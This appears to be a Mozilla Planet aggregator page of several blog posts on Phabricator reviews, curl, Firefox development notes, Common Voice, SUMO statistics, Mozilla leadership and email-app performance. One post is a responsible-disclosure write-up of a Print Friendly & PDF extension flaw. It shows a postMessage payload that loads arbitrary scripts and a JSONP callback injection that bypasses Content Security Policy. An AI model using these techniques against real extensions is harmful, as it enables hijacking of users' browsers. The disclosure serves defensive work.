
Andrew Halberstadt: Phabricator Etiquette Part 1: The Reviewer

Mozilla planet - Tue, 13/04/2021 - 21:42

In the next two posts we will examine the etiquette of using Phabricator. This post looks at tips from the reviewer’s perspective; next week’s will focus on the author’s point of view. While the social aspects of etiquette are incredibly important (we should all be polite and considerate), these posts will focus more on the mechanics of using Phabricator. In other words, how to make the review process as smooth as possible without wasting anyone’s time.

Let’s dig in!


Wladimir Palant: Print Friendly & PDF: Full compromise

Mozilla planet - Tue, 13/04/2021 - 12:41

I looked into the Print Friendly & PDF browser extension while helping someone figure out an issue they were having. The issue turned out to be unrelated to the extension, but I had already noticed something that looked very odd. A quick investigation later I could confirm a massive vulnerability affecting all of its users (close to 1 million of them). Any website could easily gain complete control of the extension.

[Screenshot: the extension’s store listing, showing 800,000+ users]

This particular issue has been resolved in Print Friendly & PDF 2.7.39 for Chrome. The underlying issues have not been addressed however, and the extension is still riddled with insecure coding practices. Hence my recommendation is still to uninstall it. Also, the Firefox variant of the extension (version 1.3) is still affected. I did not look at the Microsoft Edge variant but it hasn’t been updated recently and might also be vulnerable.

Note: To make the confusion complete, there is a browser extension called Print Friendly & PDF 2.1.0 on the Firefox Add-ons website. This one has no functionality beyond redirecting the user to printfriendly.com and isn’t affected. The problematic Firefox extension is being distributed from the vendor’s website directly.

Summary of the findings

As of version 2.7.33 for Chrome and 1.3 for Firefox, Print Friendly & PDF marked two pages (algo.html and core.html) as web-accessible, meaning that any web page could load them. The initialization routine for these pages involved receiving a message event, something that a website could easily send as well. Part of the message data was a list of scripts that would then be loaded in the extension context. While normally Content Security Policy would prevent exploitation of this Cross-Site Scripting vulnerability, here this protection was relaxed to the point of being easily circumvented. So any web page could execute arbitrary JavaScript code in the context of the extension, gaining any privileges that the extension had.

The only factor slightly alleviating this vulnerability was the fact that the extension did not request too many privileges:

"permissions": [ "activeTab", "contextMenus" ],

So any code running in the extension context could “merely”:

  • Persist until a browser restart, even if the website it originated from is closed
  • Open new tabs and browser windows at any time
  • Watch the user opening and closing tabs as well as navigating to pages, but without access to page addresses or titles
  • Arbitrarily manipulate the extension’s icon and context menu item
  • Gain full access to the current browser tab whenever this icon or context menu item was clicked
Insecure communication

When the Print Friendly & PDF extension icon is clicked, the extension first injects a content script into the current tab. This content script then adds a frame pointing to the extension’s core.html page. This requires core.html to be web-accessible, so any website can load that page as well (here assuming Chrome browser):

<iframe src="chrome-extension://ohlencieiipommannpdfcmfdpjjmeolj/core.html"></iframe>

Next, the content script needs the frame to initialize, so it takes a shortcut: it uses window.postMessage to send a message to the frame. While convenient, this API is rarely used securely in browser extensions (see the Chromium issue I filed). Here is what the receiving end looks like in this case:

window.addEventListener('message', function(event) {
  if (event.data) {
    if (event.data.type === 'PfLoadCore' && !pfLoadCoreCalled) {
      pfLoadCoreCalled = true;
      var payload = event.data.payload;
      var pfData = payload.pfData;
      var urls = pfData.config.urls;
      helper.loadScript(urls.js.jquery);
      helper.loadScript(urls.js.raven);
      helper.loadScript(urls.js.core, function() {
        window.postMessage({type: 'PfStartCore', payload: payload}, '*');
      });
      helper.loadCss(urls.css.pfApp, 'screen');
    }
  }
});

No checks are performed here, so any website can send a message like that. And helper.loadScript() does exactly what you would expect: it adds a <script> tag to the current (privileged) extension page and attempts to load whatever script it was given.

So any web page that loaded this frame can do the following:

var url = "https://example.com/xss.js"; frame.contentWindow.postMessage({ type: "PfLoadCore", payload: { pfData: { config: { urls: { js: { jquery: url } } } } } }, "*")

And the page will attempt to load this script, in the extension context.

Getting around Content Security Policy

With most web pages, this would be the point where attackers could run arbitrary JavaScript code. Browser extensions are always protected by Content Security Policy however. The default script-src 'self' policy makes exploiting Cross-Site Scripting vulnerabilities difficult (but not impossible).
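For reference, the documented default for Manifest V2 extensions that declare nothing of their own is equivalent to the following manifest entry (quoted from the documented default, so treat the exact string as approximate):

"content_security_policy": "script-src 'self'; object-src 'self'"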

But Print Friendly & PDF does not stick to the default policy. Instead, what they have is the following:

"content_security_policy": "script-src 'self' https://cdn.printfriendly.com https://www.printfriendly.com https://v.printfriendly.com https://key-cdn.printfriendly.com https://ds-4047.kxcdn.com https://www.google-analytics.com https://platform.twitter.com https://api.twitter.com https://cdnjs.cloudflare.com https://cdn.ravenjs.com",

Yes, that’s a very long list of web servers that JavaScript code can come from. In particular, the CDN servers host all kinds of JavaScript libraries. But one doesn’t really have to go there. Elsewhere in the extension code one can see:

var script = document.createElement("script");
script.src = this.config.hosts.ds_cdn + "/api/v3/domain_settings/a?callback=pfMod.saveAdSettings&hostname=" +
    this.config.hosts.page + "&client_version=" + hokil.version;

See that callback parameter? That’s JSONP, the crutch web developers used for cross-domain data retrieval before Cross-Origin Resource Sharing was widely available. It’s essentially Cross-Site Scripting, but intentional. And the callback parameter becomes part of the script.

Nowadays JSONP endpoints which are kept around for legacy reasons will usually only allow certain characters in the callback name. Not so in this case. Loading https://www.printfriendly.com/api/v3/domain_settings/a?callback=alert(location.href)//&hostname=example.com will result in the following script:

/**/alert(location.href)//(...)

So here we can inject any code into a script that is located on the www.printfriendly.com domain. If we ask the extension to load this one, Content Security Policy will no longer prevent it. Done, injection of arbitrary code into the extension context, full compromise.

What’s fixed and what isn’t

More than two months after reporting this issue I checked in on the progress. I discovered that, despite several releases, the current extension version was still vulnerable. So I sent a reminder to the vendor, warning them about the disclosure deadline getting close. The response was reassuring:

We are working on it. […] We will be finishing the update before the deadline.

When I finally looked at the fix before this publication, I noticed that it merely removed the problematic message exchange. The communication now went via the extension’s background page as it should. That’s it.
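For illustration, routing such initialization through the background page usually looks roughly like the sketch below. This is my own minimal sketch of the pattern (names like getCoreConfig are hypothetical), not the vendor’s actual code; it uses the promise-based browser.runtime API, and Chrome’s callback-based chrome.runtime equivalent works the same way:

// content script: ask the extension's background page for its configuration
browser.runtime.sendMessage({ type: "getCoreConfig" }).then(function (config) {
  // build the frame UI from config; web pages cannot inject themselves here
});

// background page: only the extension's own pages and content scripts reach this
browser.runtime.onMessage.addListener(function (message, sender) {
  if (message.type === "getCoreConfig") {
    // return only bundled, extension-local resources, never attacker-supplied URLs
    return Promise.resolve({ urls: { core: browser.runtime.getURL("core.js") } });
  }
});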

While this prevents exploitation of the issue as outlined here, all other problematic choices remain intact. In particular, the extension continues to relax Content Security Policy protection. Given how this extension works, my recommendation was hosting the core.html frame completely remotely. This has not been implemented.

No callback name validation has been added to the JSONP endpoints on www.printfriendly.com (there are multiple), so Content Security Policy integrity hasn’t been ensured this way either.
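For comparison, a typical JSONP hardening step is to allow only a narrow set of characters in the callback name before echoing it into the response. A minimal server-side sketch of such a check (my own illustration, not printfriendly.com’s code):

// reject anything that isn't a plain identifier or dotted path such as
// "pfMod.saveAdSettings" before reflecting it into the script response
function isSafeJsonpCallback(name) {
  return /^[A-Za-z_$][\w$]*(\.[A-Za-z_$][\w$]*)*$/.test(name) && name.length <= 64;
}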

Not just that, the extension continues to use JSONP for some functionality, even in privileged contexts. The JavaScript code executed here comes not merely from www.printfriendly.com but also from api.twitter.com for example. For reference: there is absolutely no valid reason for a browser extension to use JSONP.

And while the insecure message exchange has been removed, some of the extension’s interactions with web pages remain highly problematic.

Timeline
  • 2021-01-13: Reported the vulnerability to the vendor
  • 2021-01-13: Received confirmation that the issue is being looked at
  • 2021-03-21: Reminded the vendor of the disclosure deadline
  • 2021-03-22: Received confirmation that the issue will be fixed in time
  • 2021-04-07: Received notification about the issue being resolved
  • 2021-04-12: Notified the vendor about outstanding problems and lack of a Firefox release

Daniel Stenberg: talking curl on changelog again

Mozilla planet - Tue, 13/04/2021 - 00:26

We have almost a tradition now, me and the duo Jerod and Adam of the Changelog podcast. We talk curl and related stuff every three years. Back in 2015 we started out in episode 153 and we did the second one in episode 299 in 2018.

Time flies: it’s now 2021 and we once again “met up” virtually and talked curl and related stuff for a while. curl is now 23 years old and I still run the project. A few things have changed since the last curl episode, and I asked my Twitter friends what they wanted to know; I think we managed to get a whole bunch of those topics into the mix.

So, here’s the 2021 edition of Daniel on the Changelog podcast: episode 436.

The Changelog 436: Curl is a full-time job (and turns 23) – Listen on Changelog.com

Anyone want to bet if we’ll do it again in 2024?


Firefox Nightly: These Weeks in Firefox: Issue 91

Mozilla planet - Mon, 12/04/2021 - 19:12
Highlights
  • Starting from Firefox 89, we now support dynamic imports in extension content scripts. Thanks to evilpie for fixing this long-standing enhancement request!
    • NOTE: the docs have not been updated yet; refer to the new test cases landed as part of Bug 1536094 to get an idea of how to use it in extension content scripts (a minimal usage sketch also follows this list)
  • Entering a term like “seti@home” or “folding@home” in the URL bar should now search by default, rather than treating it like a URL (Bug 1693503)
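As a rough illustration of the dynamic import support mentioned in the first highlight above, a content script can now pull in an extension-bundled ES module on demand. This is a minimal sketch under assumptions of my own (the module path, the doWork function, and the web_accessible_resources listing are hypothetical, and whether that listing is required may differ between browsers), not the documented API surface:

// content-script.js: lazily load a helper module shipped with the extension
(async () => {
  const moduleUrl = browser.runtime.getURL("modules/helper.js"); // hypothetical path
  const { doWork } = await import(moduleUrl);
  doWork(document);
})();

// manifest.json (excerpt), listing the module as web accessible to be safe:
// "web_accessible_resources": ["modules/helper.js"]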
Friends of the Firefox team

For contributions made from March 23, 2021 to April 6, 2021, inclusive.

Resolved bugs (excluding employees)
Fixed more than one bug
  • Anshul Sahai
  • Claudia Batista [:claubatista]
  • Falguni Islam
  • Itiel
  • Kajal Sah
  • Michelle Goossens
  • Tim Nguyen :ntim
Project Updates
Add-ons / Web Extensions
WebExtensions Framework
  • Changes to devtools API internals related to the ongoing DevTools Fission work (Bug 1699493). Thanks to Alex Poirot for taking care of the extension APIs side of this fission-related refactoring.
  • Allowed sandboxed extension sub frames to load their own resources (Bug 1700762)
  • Fixed a non-critical regression related to the error message for a browser.runtime.sendMessage call to the extension ID of an extension that isn’t installed (Bug 1643176):
    • NOTE: non-critical because the regression was hiding the expected error message behind a generic “An unexpected error occurred” message, but under conditions that were already expected to return a rejected promise
  • Small Fission-related fix for errors logged when an iframe attached by a content script navigates to a URL that loads in a different content process (Bug 1697774)
    • NOTE: the issue wasn’t actually introducing any breakage; this is an expected scenario with Fission and it should be handled gracefully to avoid spamming the logs
WebExtension APIs
  • webNavigation API: part of the webNavigation API internals has been rewritten in C++ as part of the Fission-related changes to the WebExtensions framework (Bug 1581859). Thanks to Kris Maglione for his work on this refactoring
    • NOTE: let us know if you notice behavior regressions that may be related to the webNavigation API (e.g. D110173, attached to Bug 1594921, fixed a regression where webNavigation events for the initial about:blank document were emitted more often than with the previous “frame scripts”-based implementation)
  • tabs API: Fixed a bug that was turning a hidden tab’s URL into “about:blank” when the hidden tab is moved between windows while an extension has registered a tabs.onUpdated listener that uses a URL-based event filter (Bug 1695346).
Addon Manager & about:addons
  • Fixed a regression related to the about:addons extensions options page modals (Bug 1702059)
    • NOTE: In Firefox 89, WebExtensions options_ui pages will keep using the previous tab-modal implementation. This is helpful in the short run because it lets our Photon tab prompts restyling ride the train as is; in a follow-up we will do some more work to port these modals to the new implementation
  • Bug 1689240: Last bits of a set of simplifications and internal refactoring for the about:addons page initially contributed by ntim (plus some more tweaks we did to finalize and land it). Thanks to ntim for getting this started!
Installer & Updater Messaging System
  • Launched the “1-Click Pin During Onboarding” experiment to 100% of new Firefox 87 users on Windows 1903+ via Nimbus Preview -> Live (avoiding a copy/paste error from stage)
Password Manager
Performance
  • Doug Thayer fixed a bug where skeleton UI was breaking scroll inertia on Windows.
  • Emma Malysz is continuing work on OS.File bugs.
  • Florian Quèze is fixing tests and cleaning up old code.
Performance Tools
  • Enabled the new profiler recording panel in Dev Edition (thanks to Nicolas from the DevTools team).
  • Added Android device information inside the profile data and started to show it in the profile meta panel.
  • Fixed the network markers with service workers. Previously it was common to see “unfinished” markers. More fixes are coming.
  • Removed many MOZ_GECKO_PROFILER ifdefs, leaving fewer places that can potentially break Tier-3 platform builds.
  • You can now import the Android trace format into the Firefox Profiler analysis UI. Just drag and drop the .trace file onto profiler.firefox.com and it will import and open it automatically.
  • Added new markers:
    • Test markers (in TestUtils.jsm and BrowserTestUtils.jsm)
    • “CSS animation”
    • “CSS transition”
Search and Navigation
  • Fixed flickering of some specific results in the Address Bar – Bug 1699211, Bug 1699227
  • New tab search field hand-off to the Address Bar now uses the default Address Bar empty search mode instead of entering Search Mode for the default engine – Bug 1616700
  • The Search Service now exposes an “isGeneralPurposeEngine” property on search engines, which identifies engines that search the general web rather than specific resources or products. This may be extended in the future to provide some kind of categorization of engines (a usage sketch follows this list). – Bug 1697477
  • Re-enabling a WebExtension engine should re-prompt the user if it wants to be set as default search engine – Bug 1646338
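The sketch below shows one way privileged front-end code might consume the new isGeneralPurposeEngine property mentioned above. The filtering use case is my own illustration, not something shipped as part of Bug 1697477:

// privileged (chrome) code sketch: list only engines that search the general web
const { Services } = ChromeUtils.import("resource://gre/modules/Services.jsm");

async function getGeneralPurposeEngines() {
  const engines = await Services.search.getEngines();
  return engines.filter(engine => engine.isGeneralPurposeEngine);
}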
Screenshots

The Mozilla Blog: Mozilla partners with NVIDIA to democratize and diversify voice technology

Mozilla planet - Mon, 12/04/2021 - 19:00

As technology makes a massive shift to voice-enabled products, NVIDIA invests $1.5 million in Mozilla Common Voice to transform the voice recognition landscape

Over the next decade, speech is expected to become the primary way people interact with devices — from laptops and phones to digital assistants and retail kiosks. Today’s voice-enabled devices, however, are inaccessible to much of humanity because they cannot understand vast swaths of the world’s languages, accents, and speech patterns.

To help ensure that people everywhere benefit from this massive technological shift, Mozilla is partnering with NVIDIA, which is investing $1.5 million in Mozilla Common Voice, an ambitious, open-source initiative aimed at democratizing and diversifying voice technology development.

Most of the voice data currently used to train machine learning algorithms is held by a handful of major companies. This poses challenges for others seeking to develop high-quality speech recognition technologies, while also exacerbating the voice recognition divide between English speakers and the rest of the world.

Launched in 2017, Common Voice aims to level the playing field while mitigating AI bias. It enables anyone to donate their voices to a free, publicly available database that startups, researchers, and developers can use to train voice-enabled apps, products, and services. Today, it represents the world’s largest multi-language public domain voice data set, with more than 9,000 hours of voice data in 60 different languages, including widely spoken languages and less used ones like Welsh and Kinyarwanda, which is spoken in Rwanda. More than 164,000 people worldwide have contributed to the project thus far.

This investment will accelerate the growth of Common Voice’s data set, engage more communities and volunteers in the project, and support the hiring of new staff.

To support the expansion, Common Voice will now operate under the umbrella of the Mozilla Foundation as part of its initiatives focused on making artificial intelligence more trustworthy. According to the Foundation’s Executive Director, Mark Surman, Common Voice is poised to pioneer data donation as an effective tool the public can use to shape the future of technology for the better.

“Language is a powerful part of who we are, and people, not profit-making companies, are the right guardians of how language appears in our digital lives,” said Surman. “By making it easy to donate voice data, Common Voice empowers people to play a direct role in creating technology that helps rather than harms humanity. Mozilla and NVIDIA both see voice as a prime opportunity where people can take back control of technology and unlock its full potential.”

“The demand for conversational AI is growing, with chatbots and virtual assistants impacting nearly every industry,” said Kari Briski, senior director of accelerated computing product management at NVIDIA. “With Common Voice’s large and open datasets, we’re able to develop pre-trained models and offer them back to the community for free. Together, we’re working toward a shared goal of supporting and building communities — particularly for under-resourced and under-served languages.”

The post Mozilla partners with NVIDIA to democratize and diversify voice technology appeared first on The Mozilla Blog.


Niko Matsakis: Async Vision Doc Writing Sessions V

Mozilla planet - Mon, 12/04/2021 - 06:00

This is an exciting week for the vision doc! As of this week, we are starting to draft “shiny future” stories, and we would like your help! (We are also still working on status quo stories, so there is no need to stop working on those.) There will be a blog post coming out on the main Rust blog soon with all the details, but you can go to the “How to vision: Shiny future” page now.

This week, Ryan Levick and I are going to be hosting four Async Vision Doc Writing Sessions. Here is the schedule:

When             Who   Topic
Wed at 07:00 ET  Ryan  TBD
Wed at 15:00 ET  Niko  Shiny future – Niklaus simulates hydrodynamics
Fri at 07:00 ET  Ryan  TBD
Fri at 14:00 ET  Niko  Shiny future – Portability across runtimes

The idea for shiny future is to start by looking at the existing stories we have and to imagine how they might go differently. To be quite honest, I am not entirely sure how this is going to work, but we’ll figure it out together. It’s going to be fun. =) Come join!


Support.Mozilla.Org: What’s up with SUMO – Q1 2021

Mozilla planet - Fri, 09/04/2021 - 09:14

Hey SUMO folks,

Starting from this month, we’d like to revive our old tradition of posting a summary of what’s happening in our SUMO nation. But instead of weekly like in the old days, we’re going to post monthly updates. This post will be an exception though, as we’d like to recap the entire Q1 of 2021.

So, let’s get to it!

Welcome on board!
  1. Welcome to bingchuanjuzi (rebug). Thank you for contributing to 62 zh-CN articles despite only getting started in Oct 2020.
  2. Hello and welcome Vinay to the Gujarati localization group. Thanks for picking up the work in a locale that has been inactive for a while.
  3. Welcome back to JCPlus. Thank you for stewarding the Norsk (No) locale.
  4. Welcome brisu and Manu! Thank you for helping us with Firefox for iOS questions.
  5. Welcome to Kaio Duarte to the Social Support program!
  6. Welcome back to Devin and Matt C, who have returned to the Social Support program (Devin has helped us with Buffer Reply and Matt was part of the Army of Awesome program in the past).

Last but not least, please join us in welcoming Fabi and Daryl to the SUMO team. Fabi is the new Technical Writer (although I should note that she will be helping us with Spanish localization as well) and Daryl is joining us as a Senior User Experience Designer. Welcome both!

Community news
  • Play Store Support is transitioning to Conversocial. Please read the full announcement in our blog if you haven’t.
  • Are you following news about Firefox? If so, I have good news for you: you can now subscribe to the Firefox Daily Digest to get updates about what people are saying about Firefox and other Mozilla products on social media like Reddit and Twitter.
  • More good news from Twitter-land: we have finally regained access to the @SUMO_mozilla Twitter account (if you want to learn the backstory, go watch our community call in March). Also, go follow the account if you haven’t, because we’re going to use it to share more community updates moving forward.
  • Check out the following release notes from Kitsune in the past quarter:
Community call
  • Watch the monthly community call if you haven’t. Learn more about what’s new in January, February, and March.
  • Reminder: Don’t hesitate to join the call in person if you can. We try our best to provide a safe space for everyone to contribute. You’re more than welcome to lurk in the call if you don’t feel comfortable turning on your video or speaking up. If you feel shy to ask questions during the meeting, feel free to add your questions on the contributor forum in advance, or put them in our Matrix channel, so we can address them during the meeting.
Community stats
KB

KB Page views

Month           Page views   Vs previous month
January 2021    12,860,141   +3.72%
February 2021   11,749,283   -9.16%
March 2021      12,143,366   +3.2%

Top 5 KB contributors in the last 90 days: 

  1. AliceWyman
  2. Jeff
  3. Marchelo Ghelman
  4. Artist
  5. Underpass
KB Localization

Top 10 locales based on total page views

Locale   Jan 2021   Feb 2021   Mar 2021   Localization progress (per 6 Apr)
de       11.69%     11.3%      10.4%      98%
fr       7.33%      7.23%      6.82%      90%
es       5.98%      6.48%      6.4%       47%
zh-CN    4.7%       4.14%      5.94%      97%
ru       4.56%      4.82%      4.41%      99%
pt-BR    4.56%      5.41%      5.8%       72%
ja       3.64%      3.61%      3.68%      57%
pl       2.56%      2.54%      2.44%      83%
it       2.5%       2.44%      2.45%      95%
nl       1.03%      0.99%      0.98%      98%

Top 5 localization contributors in the last 90 days:

  1. Ihor_ck
  2. Artist
  3. Markh2
  4. JimSp472
  5. Goudron
Forum Support

Forum stats

Month      Total questions   Answer rate within 72 hrs   Solved rate within 72 hrs   Forum helpfulness
Jan 2021   3936              68.50%                      15.52%                      70.21%
Feb 2021   3582              65.33%                      14.38%                      77.50%
Mar 2021   3639              66.34%                      14.70%                      81.82%

Top 5 forum contributors in the last 90 days:

  1. Cor-el
  2. FredMcD
  3. Jscher2000
  4. Sfhowes
  5. Seburo
Social Support

Channel           Jan 2021 (total conv / handled)   Feb 2021 (total conv / handled)   Mar 2021 (total conv / handled)
@firefox          3,675 / 668                       3,403 / 136                       2,998 / 496
@FirefoxSupport   274 / 239                         188 / 55                          290 / 206

Top 5 contributors in Q1 2021

  1. Md Monirul Alom
  2. Andrew Truong
  3. Matt C
  4. Devin E
  5. Christophe Villeneuve
Play Store Support

We don’t have enough data for the Play Store Support yet. However, you can check out the overall Respond Tool metrics here.

Product updates
Firefox desktop
Firefox mobile
  • What’s new in Firefox for Android
  • Additional messaging to set Firefox as the default app was added in Firefox for iOS 32.
  • Additional widgets for iOS, as well as bookmarking improvements, were also introduced in v32.
Other products / Experiments
  • VPN MacOS and Linux Release.
  • VPN Feature Updates Release.
  • Firefox Accounts Settings Updates.
  • Mozilla ION → Rally name change
  • Add-ons project – restoring search engine defaults.
  • Sunset of Amazon Fire TV.
Shout-outs!

If you know anyone that we should feature here, please contact Kiki and we’ll make sure to add them in our next edition.

Useful links:

The Mozilla Blog: Reflections on One Year as the CEO of Mozilla

Mozilla planet - Thu, 08/04/2021 - 19:35

If we want the internet to be different we can’t keep following the same roadmap.

I am celebrating a one-year anniversary at Mozilla this week, which is funny in a way, since I have been part of Mozilla since before it had a name. Mozilla is in my DNA–and some of my DNA is in Mozilla. Twenty-two years ago I wrote the open-source software licenses that still enable our vision, and throughout my years here I’ve worn many hats. But one year ago I became CEO for the second time, and I have to say up front that being CEO this time around is the hardest role I’ve held here. And perhaps the most rewarding.

On this anniversary, I want to open up about what it means to be the CEO of a mission-driven organization in 2021, with all the complications and potential that this era of the internet brings with it. Those of you who know me, know I am generally a private person. However, in a time of rapid change and tumult for our industry and the world, it feels right to share some of what this year has taught me.

Six lessons from my first year as CEO:

1 AS CEO I STRADDLE TWO WORLDS: There has always been a tension at Mozilla, between creating products that reflect our values as completely as we can imagine, and products that fit consumers’ needs and what is possible in the current environment. At Mozilla, we feel the push and pull of competing in the market, while always seeking results from a mission perspective. As CEO, I find myself embodying this central tension.

It’s a tension that excites and energizes me. As co-founder and Chair, and Chief Lizard Wrangler of the Mozilla project before that, I have been the flag-bearer for Mozilla’s value system for many years. I see this as a role that extends beyond Mozilla’s employees. The CEO is responsible for all the employees, volunteers, products and launches and success of the company, while also being responsible for living up to the values that are at Mozilla’s core. Now, I once again wear both of these hats.

I have leaned on the open-source playbook to help me fulfill both of these obligations, attempting to wear one hat at a time, sometimes taking one off and donning the other in the middle of the same meeting. But I also find I am becoming more adept at seamlessly switching between the two, and I find that I can be intensely product oriented, while maintaining our mission as my true north.

2 MOZILLA’S MISSION IS UNCHANGED BUT HOW WE GET THERE MUST: This extremely abnormal year, filled with violence, illness, and struggle, has also confirmed something I already knew: that even amid so much flux, the DNA of Mozilla has not changed since we first formed the foundation out of the Netscape offices so many years ago. Yes, we expanded our mission statement once to be more explicit about the human experience as a more complete statement of our values.

What has changed is the world around us. And — to stick with the DNA metaphor for a second here — that has changed the epigenetics of Mozilla. In other words, it has changed the way our DNA is expressed.

3 CHANGE REQUIRES FOLLOWING A NEW PATH: We want the internet to be different. We feel an urgency to create a new and better infrastructure for the digital world, to help people get the value of data in a privacy-forward way, and to connect entrepreneurs who also want a better internet.

By definition, if you’re trying to end up in a different place, you can’t keep following the same path. This is my working philosophy. Let me tell a quick story to illustrate what I mean.

Lately we’ve been thinking a lot about data, and what it means to be a privacy-focused company that brings the benefits of data to our users. This balancing act between privacy and convenience is, of course, not a new problem, but as I was thinking about the current ways it manifests, I was reminded of the early days of Firefox.

When we first launched Firefox, we took the view that data was bad — even performance metrics about Firefox that could help us understand how Firefox performs outside of our own test environments, we viewed as private data we didn’t want. Well, you see where this is going, don’t you? We quickly learned that without such data (which we call telemetry), we couldn’t make a well functioning browser. We needed information about when or why a site crashed, how long load times were, etc. And so we took one huge step with launching Firefox, and then we had to take a step sideways, to add in the sufficient — but no more than that! — data that would allow the product to be what users wanted.

In this story you can see how we approach the dual goals of Mozilla: to be true to our values, and to create products that enable people to have a healthier experience on the internet. We find ourselves taking a step sideways to reach a new path to meet the needs of our values, our community and our product.

4 THE SUM OF OUR PARTS: Mozilla’s superpower is that our mission and our structure allow us to benefit from the aggregate strength that’s created by all our employees and volunteers and friends and users and supporters and customers.

We are more than the sum of our parts. This is my worldview, and one of the cornerstones of open-source philosophy. As CEO, one of my goals is to find new ways for Mozilla to connect with people who want to build a better internet. I know there are many people out there who share this vision, and a key goal of the coming era is finding ways to join or help communities that are also working toward a better internet.

5 BRING ME AMBITIOUS IDEAS: I am always looking for good ideas, for big ideas, and I have found that as CEO, more people are willing to come to me with their huge ambitions. I relish it. These ideas don’t always come from employees, though many do. They also come from volunteers, from people outside the company entirely, from academics, friends, all sorts of people. They honor me and Mozilla by sharing these visions, and it’s important to me to keep that dialogue open.

I am learning that it can be jarring to have your CEO randomly stop by your desk for a chat — or in remote working land, to Slack someone unexpectedly — so there need to be boundaries in place, but having a group of people who I can trust to be real with me, to think creatively with me, is essential.

The pandemic has made this part of my year harder, since it has removed the serendipity of conversations in the break room or even chance encounters at conferences that sometimes lead to the next great adventure. But Mozilla has been better poised than most businesses to have an entirely remote year, given that our workforce was already between 40 and 50 percent distributed to begin with.

6 WE SEEK TO BE AN EXAMPLE: One organization can’t change everything. At Mozilla, we dream of an internet and software ecosystem that is diverse and distributed, that uplifts and connects and enables visions for all, not just those companies or people with bottomless bank accounts. We can’t bring about this change single handedly, but we can try to change ourselves where we think we need improvement, and we can stand as an example of a different way to do things. That has always been what we wanted to do, and it remains one of our highest goals.

Above all, this year has reinforced for me that sometimes a deeply held mission requires massive wrenching change in order to be realized. I said last year that Mozilla was entering a new era that would require shifts. Our growing ambition for mission impact brings the will to make these changes, which are well underway. From the earliest days of our organization, people have been drawn to us because Mozilla captures an aspiration for something better and the drive to actually make that something happen. I cannot overstate how inspiring it is to see the dedication of the Mozilla community. I see it in our employees, I see it in our builders, I see it in our board members and our volunteers. I see it in all those who think of Mozilla and support our efforts to be more effective and have more impact. I wouldn’t be here without it. It’s the honor of my life to be in the thick of it with the Mozilla community.

– Mitchell

The post Reflections on One Year as the CEO of Mozilla appeared first on The Mozilla Blog.


Ludovic Hirlimann: My geeking plans for this summer

Thunderbird - Thu, 07/05/2015 - 10:39

During July I’ll be visiting family in Mongolia but I’ve also a few things that are very geeky that I want to do.

The first thing I want to do is plug in the RIPE Atlas probes I have. They’re little devices that look like this:

Hello @ripe #Atlas !

They enable anybody with a RIPE Atlas or RIPE account to make measurements for DNS queries and other things. This helps make the global internet better. I have three of these probes I’d like to install, which is good because last time I checked Mongolia didn’t have any active probes. These probes will also help the Internet become better in Mongolia. I’ll need to buy some network cables before leaving because finding these in Mongolia is going to be challenging. More on Atlas at https://atlas.ripe.net/.

The second thing I intend to do is map Mongolia a bit better on two projects. The first is related to Mozilla and maps GPS coordinates with wifi access points. Only a small part of the capital Ulaanbaatar is covered, as per https://location.services.mozilla.com/map#11/47.8740/106.9485, and I want this to be much more, because having an open data source for this is important for the future. As mapping is my new thing, I’ll probably also edit OpenStreetMap in order to make the urban parts of Mongolia that I’ll visit much more usable on all the services that use OSM as a source of truth. There is already a project to map the capital city at http://hotosm.org/projects/mongolia_mapping_ulaanbaatar but I believe OSM can serve more than just 50% of Mongolia’s population.

I got inspired to write this post by my son this morning; look what he is doing at 17 months:

Geeking on a Sun keyboard at 17 months

Andrew Sutherland: Talk Script: Firefox OS Email Performance Strategies

Thunderbird - Thu, 30/04/2015 - 22:11

Last week I gave a talk at the Philly Tech Week 2015 Dev Day organized by the delightful people at technical.ly on some of the tricks/strategies we use in the Firefox OS Gaia Email app.  Note that the credit for implementing most of these techniques goes to the owner of the Email app’s front-end, James Burke.  Also, a special shout-out to Vivien for the initial DOM Worker patches for the email app.

I tried to avoid having slides that both I would be reading aloud as the audience read silently, so instead of slides to share, I have the talk script.  Well, I also have the slides here, but there’s not much to them.  The headings below are the content of the slides, except for the one time I inline some code.  Note that the live presentation must have differed slightly, because I’m sure I’m much more witty and clever in person than this script would make it seem…

Cover Slide: Who!

Hi, my name is Andrew Sutherland.  I work at Mozilla on the Firefox OS Email Application.  I’m here to share some strategies we used to make our HTML5 app Seem faster and sometimes actually Be faster.

What’s A Firefox OS (Screenshot Slide)

But first: What is a Firefox OS?  It’s a multiprocess Firefox gecko engine on an android linux kernel where all the apps including the system UI are implemented using HTML5, CSS, and JavaScript.  All the apps use some combination of standard web APIs and APIs that we hope to standardize in some form.

Firefox OS homescreen screenshot Firefox OS clock app screenshot Firefox OS email app screenshot

Here are some screenshots.  We’ve got the default home screen app, the clock app, and of course, the email app.

It’s an entirely client-side offline email application, supporting IMAP4, POP3, and ActiveSync.  The goal, like all Firefox OS apps shipped with the phone, is to give native apps on other platforms a run for their money.

And that begins with starting up fast.

Fast Startup: The Problems

But that’s frequently easier said than done.  Slow-loading websites are still very much a thing.

The good news for the email application is that a slow network isn’t one of its problems.  It’s pre-loaded on the phone.  And even if it wasn’t, because of the security implications of the TCP Web API and the difficulty of explaining this risk to users in a way they won’t just click through, any TCP-using app needs to be a cryptographically signed zip file approved by a marketplace.  So we do load directly from flash.

However, it’s not like flash on cellphones is equivalent to an infinitely fast, zero-latency network connection.  And even if it was, in a naive app you’d still try and load all of your HTML, CSS, and JavaScript at the same time because the HTML file would reference them all.  And that adds up.

It adds up in the form of event loop activity and competition with other threads and processes.  With the exception of Promises which get their own micro-task queue fast-lane, the web execution model is the same as all other UI event loops; events get scheduled and then executed in the same order they are scheduled.  Loading data from an asynchronous API like IndexedDB means that your read result gets in line behind everything else that’s scheduled.  And in the case of the bulk of shipped Firefox OS devices, we only have a single processor core so the thread and process contention do come into play.

So we try not to be naive.

Seeming Fast at Startup: The HTML Cache

If we’re going to optimize startup, it’s good to start with what the user sees.  Once an account exists for the email app, at startup we display the default account’s inbox folder.

What is the least amount of work that we can do to show that?  Cache a screenshot of the Inbox.  The problem with that, of course, is that a static screenshot is indistinguishable from an unresponsive application.

So we did the next best thing, (which is) we cache the actual HTML we display.  At startup we load a minimal HTML file, our concatenated CSS, and just enough Javascript to figure out if we should use the HTML cache and then actually use it if appropriate.  It’s not always appropriate, like if our application is being triggered to display a compose UI or from a new mail notification that wants to show a specific message or a different folder.  But this is a decision we can make synchronously so it doesn’t slow us down.

Local Storage: Okay in small doses

We implement this by storing the HTML in localStorage.

